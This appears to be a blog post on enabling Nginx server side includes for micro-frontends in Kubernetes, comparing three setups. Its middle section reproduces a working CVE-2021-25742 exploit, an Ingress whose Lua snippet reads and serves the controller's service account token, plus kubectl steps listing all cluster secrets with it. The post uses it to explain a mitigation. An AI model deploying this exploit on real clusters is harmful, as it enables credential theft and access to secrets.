Micro-frontends and Ingress Nginx - Server Side Includes

Context

I was recently involved in researching how to enable SSI (server side includes) at the Ingress (Nginx) level. Citing the Wikipedia definition, SSI is a simple interpreted server-side scripting language used almost exclusively for the World Wide Web. It is most useful for including the contents of one or more files into a web page on a web server, using its #include directive.

This was a very convenient way of adding the current date to web pages back in the old days:

<!--#echo var="DATE_LOCAL" -->

Nowadays, it is mainly used to implement micro-frontend architectures, which extend the concepts of microservices to frontend development as a way of breaking up large frontend layers, also called frontend monoliths. I won’t dig deeper into the benefits of the micro-frontend architecture; the micro-frontends webpage contains a lot of information and resources in that regard.

To illustrate the micro-frontend paradigm, here is an absurdly simple example of a web page that includes 2 sub-pages, /alpha and /beta:

    <!DOCTYPE html>
    <html lang="en">
      <head>
        <meta charset="utf-8">
        <title>Hello World! Main page</title>
      </head>
      <body>
        <h1>Hello World! Main page</h1>
        <!--# set var="test" value="Hello stranger! SSI is on!" -->
        <!--# echo var="test" -->
        <!--# include virtual="/alpha" -->
        <!--# include virtual="/beta" -->
      </body>
    </html>

Both the /alpha and /beta child pages would serve something like this:

    <!DOCTYPE html>
    <html lang="en">
      <head>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <title></title>
      </head>
      <body>
        <h2>Hello World! SSI page X</h2>
        <div id="test"></div>
        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>
      </body>
    </html>

The resulting page combines the main heading, the echoed test variable, and the content of both sub-pages.
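
To make the composition step concrete, here is a toy sketch in Python of what a server with SSI enabled does with the set, echo and include directives used above. It is not how nginx is implemented: the PAGES dictionary, the render function and the shortened child pages are all assumptions made for illustration, and included pages are looked up in memory instead of being fetched from other services.

```python
import re

# Hypothetical in-memory stand-ins for the main page and the two child services.
PAGES = {
    "/": (
        "<h1>Hello World! Main page</h1>\n"
        '<!--# set var="test" value="Hello stranger! SSI is on!" -->\n'
        '<!--# echo var="test" -->\n'
        '<!--# include virtual="/alpha" -->\n'
        '<!--# include virtual="/beta" -->\n'
    ),
    "/alpha": "<h2>Hello World! SSI page alpha</h2>",
    "/beta": "<h2>Hello World! SSI page beta</h2>",
}

# Matches <!--# command name="value" ... --> on a single line.
DIRECTIVE = re.compile(r'<!--#\s*(\w+)\s+(.*?)\s*-->')
PARAM = re.compile(r'(\w+)="([^"]*)"')


def render(path):
    """Expand the set, echo and include directives of the page at `path`."""
    variables = {}

    def expand(match):
        command = match.group(1)
        params = dict(PARAM.findall(match.group(2)))
        if command == "set":
            variables[params["var"]] = params["value"]
            return ""
        if command == "echo":
            # nginx prints "(none)" for an undefined variable by default
            return variables.get(params["var"], "(none)")
        if command == "include":
            # the real server issues a subrequest here; the toy recurses
            return render(params["virtual"])
        return match.group(0)  # leave unknown directives untouched

    return DIRECTIVE.sub(expand, PAGES[path])


print(render("/"))
```

The point of the sketch is only that the includes are resolved on the server, so the browser receives a single, already assembled document.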

Now that we have this simple web page made up of 2 sub-pages, the challenge is how to support it on modern infrastructure, Kubernetes, and in this case with one of the most widely used Ingress implementations: Ingress Nginx.

Before moving on to the different implementation options, you can find all the YAML files used in this article here: micro-frontends-in-k8s

The Good - SSI behind Ingress



The first approach is the most straightforward way of implementing a micro-frontend architecture in Kubernetes, independently of which Ingress implementation the cluster is using. The main idea is to have a web server (Nginx) service that hosts the main page and whose server side includes configuration points to the other services running in the cluster, which make up the other parts of the page.

The tricky part is the nginx configuration of the main service. It sets ssi on; in the server block and uses proxy_pass to forward the locations we need (/alpha and /beta) to the services hosting the other parts of the web page (the trailing / is important here):

    user nginx;
    worker_processes auto;

    events {
        worker_connections 1024;
    }

    http {
        keepalive_timeout 65;
        gzip on;

        server {
            listen 80;
            server_name localhost;

            ssi on;
            ssi_silent_errors off;

            proxy_set_header Accept-Encoding "";
            proxy_intercept_errors on;
            proxy_ssl_server_name on;

            location / {
                root /usr/share/nginx/html; #Change this line
                index index.html index.htm;
            }

            location /alpha {
                proxy_pass http://alpha.default.svc.cluster.local/;
            }

            location /beta {
                proxy_pass http://beta.default.svc.cluster.local/;
            }
        }
    }


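
Why the trailing / in proxy_pass matters can be sketched in a few lines of Python. When proxy_pass carries a URI part, nginx replaces the part of the request URI that matched the location with that URI; without a URI part, the request URI is forwarded unchanged. The upstream_uri helper below is hypothetical and deliberately simplified (prefix locations only, no query strings, no URI normalization).

```python
def upstream_uri(request_uri, location_prefix, proxy_pass_uri=None):
    """Return the URI that would be sent upstream for a prefix location.

    proxy_pass_uri is the path part of the proxy_pass URL ("/" for
    http://host/), or None when proxy_pass has no URI part (http://host).
    """
    if proxy_pass_uri is None:
        # No URI in proxy_pass: the request URI is forwarded unchanged.
        return request_uri
    # URI present: the part matching the location is replaced by it.
    return proxy_pass_uri + request_uri[len(location_prefix):]


# With the trailing slash, the child service is asked for its root page.
print(upstream_uri("/alpha", "/alpha", "/"))  # /
# Without it, the child service would be asked for /alpha instead.
print(upstream_uri("/alpha", "/alpha"))       # /alpha
```

In this setup the child services serve their page at /, which is why the configuration above uses the form with the trailing slash.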

The Evil - SSI at Ingress level with server-snippets

The next option would be what many would consider the easiest to maintain. It involves enabling the server side includes (the ssi on; parameter present in the main service of the previous implementation) at the Ingress level, that is, in the Ingress object itself.

It’s technically possible to modify the Ingress Nginx server-level configuration from the Ingress object definition through the server-snippet annotation:

    apiVersion: networking.k8s.io/v1
    kind: Ingress
    metadata:
      annotations:
        nginx.ingress.kubernetes.io/rewrite-target: /$2
        nginx.ingress.kubernetes.io/server-snippet: |
          ssi on;
      name: micro-frontend
      namespace: default
    spec:
      ingressClassName: nginx
      rules:
      - http:
          paths:
          - backend:
              service:
                name: main
                port:
                  name: http
            path: /
            pathType: Prefix
          - backend:
              service:
                name: alpha
                port:
                  name: http
            path: /alpha(/|$)(.*)
            pathType: Prefix
          - backend:
              service:
                name: beta
                port:
                  name: http
            path: /beta(/|$)(.*)
            pathType: Prefix

However, this requires allowing snippet annotations in the Ingress controller (the allow-snippet-annotations setting), which in turn gives access to NGINX configuration primitives that are not validated by the Ingress controller. If you use the Helm chart, you can enable snippets by installing the controller with the value controller.allowSnippetAnnotations=true:

    λ helm upgrade --install ingress-nginx ingress-nginx \
        --repo https://kubernetes.github.io/ingress-nginx \
        --namespace ingress-nginx --create-namespace \
        --set controller.allowSnippetAnnotations=true

It turns out that enabling this option exposes the controller to CVE-2021-25742, which, in summary, allows retrieval of the ingress-nginx service account token and of secrets across all namespaces.

I took some of the resources from the HackerOne report to reproduce the vulnerability:

    apiVersion: networking.k8s.io/v1
    kind: Ingress
    metadata:
      name: exploit-ingress
      namespace: default
      annotations:
        nginx.ingress.kubernetes.io/app-root: /token
        nginx.ingress.kubernetes.io/server-snippet: |
          set_by_lua $token '
            local file = io.open("/run/secrets/kubernetes.io/serviceaccount/token")
            if not file then return nil end
            local content = file:read "*a"
            file:close()
            return content
          ';
          location = /token {
            content_by_lua_block {
              ngx.say(ngx.var.token)
            }
          }
    spec:
      ingressClassName: nginx
      rules:
      - http:
          paths:
          - path: /
            pathType: Prefix
            backend:
              service:
                name: dummy-service
                port:
                  name: http

Accessing this Ingress exposes the service account token used by the Ingress controller.

Once you obtain this token, you can verify that you are able to list (and fetch the contents of) all the cluster secrets:

    λ kubectl config set-credentials ingress-exploit "--token=string-from-exploited-sa"
    λ kubectl config set-context ingress-exploit --cluster=kind --user=ingress-exploit --namespace=default
    λ kubectl config use-context ingress-exploit
    λ kubectl get secrets -A
    NAMESPACE        NAME                                  TYPE                            DATA   AGE
    ingress-nginx    ingress-nginx-admission               Opaque                          3      20h
    ingress-nginx    sh.helm.release.v1.ingress-nginx.v1   helm.sh/release.v1              1      20h
    ingress-nginx    sh.helm.release.v1.ingress-nginx.v2   helm.sh/release.v1              1      20h
    kube-system      bootstrap-token-abcdef                bootstrap.kubernetes.io/token   6      20h
    metallb-system   memberlist                            Opaque                          1      20h
    metallb-system   webhook-server-cert                   Opaque                          4      20h

The mitigation is, basically, to leave the server-snippets disabled.
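
If snippets have been enabled at some point, it can be useful to check which Ingress objects actually rely on them before turning the option off again. The following is a minimal sketch, assuming the manifests have already been loaded into plain Python dictionaries (for example from kubectl get ingress -A -o json); the snippet_annotations helper is hypothetical and simply looks for ingress-nginx annotation keys ending in -snippet.

```python
SNIPPET_PREFIX = "nginx.ingress.kubernetes.io/"


def snippet_annotations(ingress):
    """Return the snippet annotation keys set on an Ingress manifest (a dict)."""
    annotations = ingress.get("metadata", {}).get("annotations") or {}
    return sorted(
        key for key in annotations
        if key.startswith(SNIPPET_PREFIX) and key.endswith("-snippet")
    )


# Trimmed-down version of the exploit Ingress shown above.
exploit = {
    "kind": "Ingress",
    "metadata": {
        "name": "exploit-ingress",
        "annotations": {
            "nginx.ingress.kubernetes.io/app-root": "/token",
            "nginx.ingress.kubernetes.io/server-snippet": "set_by_lua $token '...';",
        },
    },
}

print(snippet_annotations(exploit))
```

An empty result for every Ingress in the cluster suggests that snippets can be left disabled without breaking existing routes.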

The Ugly - SSI at Ingress with custom configuration

The last option I came up with is to enable the server side includes (ssi on; parameter) directly at the configuration level.

I call this ugly because it involves “customizing” the default configuration template. Here is a partial view of the ConfigMap holding the customized template, with the ssi on; directive inside the http block:

    apiVersion: v1
    kind: ConfigMap
    metadata:
      name: ingress-nginx-template
      # Must live in the controller's namespace so the controller pod can mount it
      namespace: ingress-nginx
    data:
      main-template: |
        {{ $all := . }}
        {{ $servers := .Servers }}
        {{ $cfg := .Cfg }}
        {{ $IsIPV6Enabled := .IsIPV6Enabled }}
        {{ $healthzURI := .HealthzURI }}
        {{ $backends := .Backends }}
        {{ $proxyHeaders := .ProxySetHeaders }}
        {{ $addHeaders := .AddHeaders }}
        # Configuration checksum: {{ $all.Cfg.Checksum }}
        # setup custom paths that do not require root access
        pid {{ .PID }};
        {{ if $cfg.UseGeoIP2 }}
        load_module /etc/nginx/modules/ngx_http_geoip2_module.so;
        {{ end }}
        ...
        http {
            ssi on;
            lua_package_path "/etc/nginx/lua/?.lua;;";
            {{ buildLuaSharedDictionaries $cfg $servers }}
            init_by_lua_block {
                collectgarbage("collect")
                -- init modules
                local ok, res
                ...

You can retrieve the configuration template from a default Nginx Ingress controller installation, leveraging kubectl cp:

λ kubectl cp -n ingress-nginx ingress-nginx-controller-7bf78659d-qqknq:/etc/nginx/template/nginx.tmpl nginx.tmpl
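
The customization itself is a single added line. As a rough sketch, and assuming the retrieved template opens its http block with a line containing only `http {` (as in the partial output above), the edit could be scripted in Python like this; the enable_ssi helper and the shortened sample template are hypothetical.

```python
def enable_ssi(template_text):
    """Insert `ssi on;` right after the first line that opens the http block."""
    lines = template_text.splitlines(keepends=True)
    for index, line in enumerate(lines):
        if line.strip() == "http {":
            # Reuse the indentation of the http line and add one level.
            indent = line[: len(line) - len(line.lstrip())]
            lines.insert(index + 1, f"{indent}    ssi on;\n")
            return "".join(lines)
    raise ValueError("no 'http {' line found in template")


# Shortened stand-in for the real nginx.tmpl contents.
sample = (
    "pid {{ .PID }};\n"
    "http {\n"
    '    lua_package_path "/etc/nginx/lua/?.lua;;";\n'
    "}\n"
)

print(enable_ssi(sample))
```

The patched text is what goes under the main-template key of the ConfigMap. Keep in mind that the template is tied to the controller version, so the same edit has to be reapplied to the new template after each controller upgrade.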

After creating the ConfigMap, we can point the Ingress installation to it by setting the controller.customTemplate.configMapName and controller.customTemplate.configMapKey values:

    λ helm upgrade --install ingress-nginx ingress-nginx \
        --repo https://kubernetes.github.io/ingress-nginx \
        --namespace ingress-nginx --create-namespace \
        --set controller.customTemplate.configMapName=ingress-nginx-template \
        --set controller.customTemplate.configMapKey=main-template

And that’s it, the Ingress without the server-snippet annotation works just fine:

    apiVersion: networking.k8s.io/v1
    kind: Ingress
    metadata:
      annotations:
        nginx.ingress.kubernetes.io/rewrite-target: /$2
      name: micro-frontend
      namespace: default
    spec:
      ingressClassName: nginx
      rules:
      - http:
          paths:
          - backend:
              service:
                name: main
                port:
                  name: http
            path: /
            pathType: Prefix
          - backend:
              service:
                name: alpha
                port:
                  name: http
            path: /alpha(/|$)(.*)
            pathType: Prefix
          - backend:
              service:
                name: beta
                port:
                  name: http
            path: /beta(/|$)(.*)
            pathType: Prefix
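
The alpha and beta rules in this Ingress depend on the rewrite-target annotation: the second capture group of the path expression becomes the path sent to the backend, so a request for /alpha reaches the alpha service as /. The Python sketch below mimics that mapping under simplifying assumptions (the route helper is hypothetical, only the two regex rules are modelled, and matching details of the real controller are ignored).

```python
import re

# (path expression from the Ingress, backend service name)
RULES = [
    (r"/alpha(/|$)(.*)", "alpha"),
    (r"/beta(/|$)(.*)", "beta"),
]


def route(request_path, rewrite_target="/$2"):
    """Return (service, rewritten path) for the alpha and beta rules, or None."""
    for pattern, service in RULES:
        match = re.match(pattern, request_path)
        if match:
            # Replace $1, $2, ... in the target with the captured groups.
            rewritten = re.sub(
                r"\$(\d+)",
                lambda ref: match.group(int(ref.group(1))) or "",
                rewrite_target,
            )
            return service, rewritten
    return None


print(route("/alpha"))        # ('alpha', '/')
print(route("/beta/app.js"))  # ('beta', '/app.js')
print(route("/alphabet"))     # None
```

The (/|$) group is what keeps a path such as /alphabet from being routed to the alpha service.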

Conclusions

- These were some quick ways to implement micro-frontend architectures in Kubernetes running Nginx Ingress controller.

- In multi-tenant platforms where different users are able to manage their Ingress resources, enabling server-snippets might not be the best approach.

- Maintaining a custom configuration template for the controller introduces the risk of breaking the whole Ingress controller in case of a misconfiguration.

- Implementing the micro-frontend behind the Ingress controller seems to be the best approach.